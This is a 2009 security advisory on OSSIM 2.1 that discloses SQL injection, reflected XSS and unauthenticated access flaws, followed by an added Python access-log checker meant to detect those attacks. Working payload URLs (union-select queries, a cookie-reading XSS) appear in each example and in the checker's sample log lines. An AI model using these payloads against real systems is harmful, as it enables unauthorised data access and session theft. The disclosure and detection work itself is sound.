OSSIM (Open Source Security Information Management) is affected by multiple security vulnerabilities:

1. SQL Injections
2. Linked XSS
3. Unauthorized access

Digital Security Research Group [DSecRG] Advisory #DSECRG-09-055

Application: OSSIM
Versions Affected: 2.1 and possibly 2.1.1
Vendor URL: http://ossim.net/
Bug: SQL Injection, XSS, Unauthorized access
Exploits: YES
Reported: 07.09.2009
Vendor response: 09.09.2009
Solution: YES (version 2.1.2)
Date of Public Advisory: 21.09.2009
Author: Sintsov Alexey of Digital Security Research Group [DSecRG]

Details
*******

1.1 SQL injections in repository

The attacker needs to be authorized in the system for the attack to succeed.

Vulnerable script - repository_document.php
Vulnerable parameter - id_document

Example
*******

http://OSSIM-SERVER/ossim/repository/repository_document.php?id_document=-3 union select 1,2,user(),4,5,6--&maximized=1&search_bylink=&pag=1

1.2 SQL injections in repository

The attacker needs to be authorized in the system for the attack to succeed.

Vulnerable script - repository_links.php
Vulnerable parameter - id_document

Example
*******

http://OSSIM-SERVER/ossim/repository/repository_links.php?id_document=-3 union select 1,user(),3,4,5,6

1.3 SQL injections in repository

The attacker needs to be authorized in the system for the attack to succeed.

Vulnerable script - repository_editdocument.php
Vulnerable parameter - id_document

Example
*******

http://OSSIM-SERVER/ossim/repository/repository_editdocument.php?id_document=-3 union select 1,user(),3,4,5,6

1.4 SQL injection in policy scripts

The attacker needs to be authorized in the system for the attack to succeed.

Vulnerable script - getpolicy.php
Vulnerable parameter - group

Example
*******

http://OSSIM-SERVER/ossim/policy/getpolicy.php?group=0 and 1=1

1.5 SQL injection in policy scripts

The attacker needs to be authorized in the system for the attack to succeed.

Vulnerable script - newhostgroupform.php
Vulnerable parameter - name

Example
*******

http://OSSIM-SERVER/ossim/host/newhostgroupform.php?name=' union select user(),'b','c','d','f

1.6 SQL injection in policy scripts

The attacker needs to be authorized in the system for the attack to succeed.

Vulnerable script - modifynetform.php
Vulnerable parameter - name

Example
*******

http://OSSIM-SERVER/ossim/net/modifynetform.php?name=' union select user(),'b','c','d','e','f','g','h','a

Other scripts in the policy menu are affected as well.

2. Linked XSS in main menu

Vulnerable script - /ossim/
Vulnerable parameter - option

Example
*******

http://OSSIM-SERVER/ossim/?option=0" onload=alert(document.cookie) a="

3. Access to data without authentication

An unauthorized user can view graphs and the infrastructure.

Example
*******

Access to the graph:
http://OSSIM-SERVER/ossim/graphs/alarms_events.php

Internal infrastructure view:
http://OSSIM-SERVER/ossim/host/draw_tree.php

Fix Information
***************

Upgrade to version 2.1.2

References
**********

http://www.alienvault.com/community.php?section=News
http://dsecrg.com/pages/vul/show.php?id=155

About
*****

Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
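
Added example (not part of the DSecRG advisory or of OSSIM's code): a log check for servers that ran an affected version, flagging requests to the scripts listed above whose vulnerable parameter does not have the expected shape, plus any request to the two pages from item 3. Assumptions: the web server writes common/combined-format access logs, id_document and group are numeric IDs, and name and option never legitimately contain quotes or angle brackets; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed parameter shapes (not taken from OSSIM's code).
INT = re.compile(r"\d+\Z")            # id_document, group: plain numeric ID
PLAIN = re.compile(r"[^'\"<>]*\Z")    # name, option: no quotes or angle brackets

# Script -> (vulnerable parameter, expected shape), from advisory items 1.1-1.6 and 2.
RULES = {
    "/ossim/repository/repository_document.php": ("id_document", INT),
    "/ossim/repository/repository_links.php": ("id_document", INT),
    "/ossim/repository/repository_editdocument.php": ("id_document", INT),
    "/ossim/policy/getpolicy.php": ("group", INT),
    "/ossim/host/newhostgroupform.php": ("name", PLAIN),
    "/ossim/net/modifynetform.php": ("name", PLAIN),
    "/ossim/": ("option", PLAIN),
}
# Item 3: pages served without authentication on affected versions.
OPEN_PAGES = {"/ossim/graphs/alarms_events.php", "/ossim/host/draw_tree.php"}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def check_line(line):
    """Return a list of (kind, path, detail) findings for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    findings = []
    if url.path in OPEN_PAGES:
        findings.append(("open-page", url.path, "verify the client had a session"))
    rule = RULES.get(url.path)
    if rule:
        param, shape = rule
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if not shape.match(value):  # value is already URL-decoded by parse_qs
                findings.append(("bad-param", url.path, f"{param}={value!r}"))
    return findings

# Constructed sample log lines (not from a real server).
SAMPLE = [
    '10.0.0.5 - - [21/Sep/2009:10:00:01 +0000] "GET /ossim/repository/repository_document.php?id_document=12&pag=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [21/Sep/2009:10:00:07 +0000] "GET /ossim/repository/repository_links.php?id_document=-3%20union%20select%201,user(),3,4,5,6 HTTP/1.1" 200 734',
    '10.0.0.9 - - [21/Sep/2009:10:00:09 +0000] "GET /ossim/?option=0%22%20onload=alert(document.cookie)%20a=%22 HTTP/1.1" 200 901',
    '10.0.0.9 - - [21/Sep/2009:10:00:12 +0000] "GET /ossim/host/draw_tree.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(check_line(line))
```

Because the check validates the shape of each parameter instead of matching SQL keywords, it also catches the boolean probe form shown in 1.4. Only query strings are inspected, so values sent in a POST body are not seen.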